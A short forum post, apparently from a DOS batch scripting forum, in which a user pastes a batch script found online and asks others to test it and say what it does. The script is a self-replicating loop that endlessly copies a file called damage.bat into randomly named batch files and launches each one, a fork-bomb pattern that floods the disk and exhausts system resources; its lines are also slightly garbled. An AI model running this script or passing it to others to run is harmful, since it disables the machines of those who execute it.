I found this code on the web while search for something and I'm not sure its working some test it and tell me what it does
@echo off
:A
Set /A
X=%RANDOM%%%1999999999%
Type damage.bat >> %x%.bat
Start %x%.bat
Goto:A
Thanks
Search found 1 match
- 19 Feb 2020 15:13
- Forum: DOS Batch Forum
- Topic: Expanding files
- Replies: 1
- Views: 10040